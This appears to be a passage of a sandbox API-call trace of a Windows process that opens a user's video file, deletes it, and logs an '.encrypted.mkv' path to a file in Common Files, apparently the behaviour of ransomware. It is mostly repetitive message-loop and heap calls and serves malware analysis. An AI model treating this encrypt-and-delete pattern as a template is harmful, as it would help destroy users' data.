PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.294] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.294] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.294] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.294] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.294] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.294] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.294] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.294] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.294] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.294] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.294] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.294] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.294] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0042.295] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0042.295] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\sKe8ZL\\dqh_rUYpMIjJ4.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ske8zl\\dqh_ruypmijj4.mkv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x128 [0042.295] FreeLibrary (hLibModule=0x76e10000) returned 1 [0042.295] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.295] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.295] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0042.295] CharUpperBuffW (in: lpsz="_WINAPI_WRITEFILE", cchLength=0x11 | out: lpsz="_WINAPI_WRITEFILE") returned 0x11 [0042.295] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0042.295] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0042.295] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0042.296] FreeLibrary (hLibModule=0x76e10000) returned 1 [0042.296] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0042.296] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0042.296] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0042.296] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0042.296] CharUpperBuffW (in: lpsz="_WINAPI_CLOSEHANDLE", cchLength=0x13 | out: lpsz="_WINAPI_CLOSEHANDLE") returned 0x13 [0042.296] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0042.296] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0042.296] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0042.296] FreeLibrary (hLibModule=0x76e10000) returned 1 [0042.296] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0042.296] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0042.296] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0042.296] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\sKe8ZL\\dqh_rUYpMIjJ4.mkv", nBufferLength=0x7fff, lpBuffer=0x69e9c8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\sKe8ZL\\dqh_rUYpMIjJ4.mkv", lpFilePart=0x0) returned 0x3d [0042.297] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\sKe8ZL\\dqh_rUYpMIjJ4.mkv", lpFindFileData=0x6aea10 | out: lpFindFileData=0x6aea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x66381900, ftCreationTime.dwHighDateTime=0x1d5c065, ftLastAccessTime.dwLowDateTime=0x2ecab3d0, ftLastAccessTime.dwHighDateTime=0x1d5c47d, ftLastWriteTime.dwLowDateTime=0x18ea3420, ftLastWriteTime.dwHighDateTime=0x1d5e3d9, nFileSizeHigh=0x0, nFileSizeLow=0xf447, dwReserved0=0x6cf858, dwReserved1=0x77391ecd, cFileName="dqh_rUYpMIjJ4.mkv", cAlternateFileName="DQH_RU~1.MKV")) returned 0x7c2240 [0042.297] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\sKe8ZL\\dqh_rUYpMIjJ4.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ske8zl\\dqh_ruypmijj4.mkv")) returned 1 [0042.298] FindNextFileW (in: hFindFile=0x7c2240, lpFindFileData=0x6aea10 | out: lpFindFileData=0x6aea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x66381900, ftCreationTime.dwHighDateTime=0x1d5c065, ftLastAccessTime.dwLowDateTime=0x2ecab3d0, ftLastAccessTime.dwHighDateTime=0x1d5c47d, ftLastWriteTime.dwLowDateTime=0x18ea3420, ftLastWriteTime.dwHighDateTime=0x1d5e3d9, nFileSizeHigh=0x0, nFileSizeLow=0xf447, dwReserved0=0x6cf858, dwReserved1=0x77391ecd, cFileName="dqh_rUYpMIjJ4.mkv", cAlternateFileName="DQH_RU~1.MKV")) returned 0 [0042.299] FindClose (in: hFindFile=0x7c2240 | out: hFindFile=0x7c2240) returned 1 [0042.299] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0042.301] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0042.301] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1648 [0042.301] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca18 [0042.301] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5e8 [0042.301] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdf0 [0042.301] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5c8 [0042.301] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae948 [0042.301] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c748 [0042.301] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4b8 [0042.301] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab260 [0042.301] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0042.301] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0042.301] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b16e8 [0042.301] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdd8 [0042.301] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af338 [0042.301] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="v", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0042.301] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="kv", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0042.301] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mkv", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0042.301] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".mkv", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0042.301] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0042.301] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3e8 [0042.301] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af568 [0042.301] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0042.301] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1710 [0042.301] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891f0 [0042.302] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3e8 [0042.302] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0042.302] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af568 [0042.302] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1850 [0042.302] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbf8 [0042.302] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af478 [0042.302] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cee0 [0042.302] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0042.302] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af568 [0042.302] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a60 [0042.302] CreateFileW (lpFileName="C:\\PROGRA~2\\COMMON~1\\log.txt" (normalized: "c:\\progra~2\\common~1\\log.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0042.302] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0042.302] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee24 | out: lpNewFilePointer=0x0) returned 1 [0042.302] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0042.303] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee04 | out: lpNewFilePointer=0x0) returned 1 [0042.303] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5c8 [0042.303] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10000) returned 0xab2010 [0042.303] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3e8 [0042.303] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0042.303] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee14 | out: lpNewFilePointer=0x0) returned 1 [0042.303] ReadFile (in: hFile=0x128, lpBuffer=0xaa0008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0xaa0008*, lpNumberOfBytesRead=0x6aee3c*=0x3400, lpOverlapped=0x0) returned 1 [0042.304] ReadFile (in: hFile=0x128, lpBuffer=0xaa0008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0xaa0008*, lpNumberOfBytesRead=0x6aee3c*=0x0, lpOverlapped=0x0) returned 1 [0042.304] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x3400, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0042.304] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee04 | out: lpNewFilePointer=0x0) returned 1 [0042.304] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0042.304] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0xab2010 | out: hHeap=0x770000) returned 1 [0042.304] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8895c8 [0042.305] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3e8 [0042.305] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\sKe8ZL\\dqh_rUYpMIjJ4.encrypted.mkv\r\n", cchWideChar=74, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 74 [0042.305] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4a) returned 0x7f3688 [0042.305] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\sKe8ZL\\dqh_rUYpMIjJ4.encrypted.mkv\r\n", cchWideChar=74, lpMultiByteStr=0x7f3688, cbMultiByte=74, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\sKe8ZL\\dqh_rUYpMIjJ4.encrypted.mkv\r\n", lpUsedDefaultChar=0x0) returned 74 [0042.305] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8895c8 | out: hHeap=0x770000) returned 1 [0042.305] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x50) returned 0x7f36e0 [0042.305] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7f3688 | out: hHeap=0x770000) returned 1 [0042.305] WriteFile (in: hFile=0x128, lpBuffer=0x7f36e0*, nNumberOfBytesToWrite=0x49, lpNumberOfBytesWritten=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0x7f36e0*, lpNumberOfBytesWritten=0x6aee3c*=0x49, lpOverlapped=0x0) returned 1 [0042.305] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7f36e0 | out: hHeap=0x770000) returned 1 [0042.305] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0042.305] CloseHandle (hObject=0x128) returned 1 [0042.306] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca30 | out: hHeap=0x770000) returned 1 [0042.306] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0042.306] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0xaa0008 | out: hHeap=0x770000) returned 1 [0042.307] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2240 | out: hHeap=0x770000) returned 1 [0042.307] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab260 | out: hHeap=0x770000) returned 1 [0042.307] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0042.307] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdf0 | out: hHeap=0x770000) returned 1 [0042.307] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca18 | out: hHeap=0x770000) returned 1 [0042.307] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c5448 | out: hHeap=0x770000) returned 1 [0042.307] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0042.307] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a60 | out: hHeap=0x770000) returned 1 [0042.307] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c748 | out: hHeap=0x770000) returned 1 [0042.307] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1648 | out: hHeap=0x770000) returned 1 [0042.307] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0042.307] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c20c0 | out: hHeap=0x770000) returned 1 [0042.307] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0042.307] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab2f0 | out: hHeap=0x770000) returned 1 [0042.307] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c838 | out: hHeap=0x770000) returned 1 [0042.307] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b12b0 | out: hHeap=0x770000) returned 1 [0042.307] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0042.308] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13c8 | out: hHeap=0x770000) returned 1 [0042.308] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7d5c40 | out: hHeap=0x770000) returned 1 [0042.308] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0042.308] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899b8 | out: hHeap=0x770000) returned 1 [0042.308] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c760 | out: hHeap=0x770000) returned 1 [0042.308] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccb8 | out: hHeap=0x770000) returned 1 [0042.308] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0042.308] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0c70 | out: hHeap=0x770000) returned 1 [0042.308] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889970 | out: hHeap=0x770000) returned 1 [0042.308] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1300 | out: hHeap=0x770000) returned 1 [0042.308] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0042.308] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0ce8 | out: hHeap=0x770000) returned 1 [0042.308] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889958 | out: hHeap=0x770000) returned 1 [0042.308] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd48 | out: hHeap=0x770000) returned 1 [0042.308] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1378 | out: hHeap=0x770000) returned 1 [0042.308] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0042.308] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1328 | out: hHeap=0x770000) returned 1 [0042.308] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891d8 | out: hHeap=0x770000) returned 1 [0042.308] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889988 | out: hHeap=0x770000) returned 1 [0042.308] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdc0 | out: hHeap=0x770000) returned 1 [0042.308] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0042.308] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14e0 | out: hHeap=0x770000) returned 1 [0042.308] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9b8 | out: hHeap=0x770000) returned 1 [0042.308] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0042.308] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889aa8 | out: hHeap=0x770000) returned 1 [0042.308] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889688 | out: hHeap=0x770000) returned 1 [0042.308] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13f0 | out: hHeap=0x770000) returned 1 [0042.308] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0042.308] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14b8 | out: hHeap=0x770000) returned 1 [0042.308] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8b0 | out: hHeap=0x770000) returned 1 [0042.308] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af438 | out: hHeap=0x770000) returned 1 [0042.309] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1508 | out: hHeap=0x770000) returned 1 [0042.309] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889538 | out: hHeap=0x770000) returned 1 [0042.309] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889928 | out: hHeap=0x770000) returned 1 [0042.309] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1440 | out: hHeap=0x770000) returned 1 [0042.309] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0042.309] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2080 | out: hHeap=0x770000) returned 1 [0042.309] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0042.309] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0042.309] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af438 [0042.309] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5b8 [0042.309] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1440 [0042.309] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0042.309] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1440 | out: hHeap=0x770000) returned 1 [0042.309] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0042.309] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1440 [0042.309] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7af5b8 [0042.309] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1508 [0042.309] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889928 [0042.309] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af368 [0042.309] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af608 [0042.309] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0042.309] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889538 [0042.309] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0042.309] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88c8b0 [0042.309] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b14b8 [0042.309] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889688 [0042.309] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af368 [0042.309] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889aa8 [0042.309] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9b8 [0042.310] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab2f0 [0042.310] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0042.310] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af608 [0042.310] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b13f0 [0042.310] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdc0 [0042.310] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af588 [0042.310] RtlAllocateHeap (HeapHandle=0x770000, 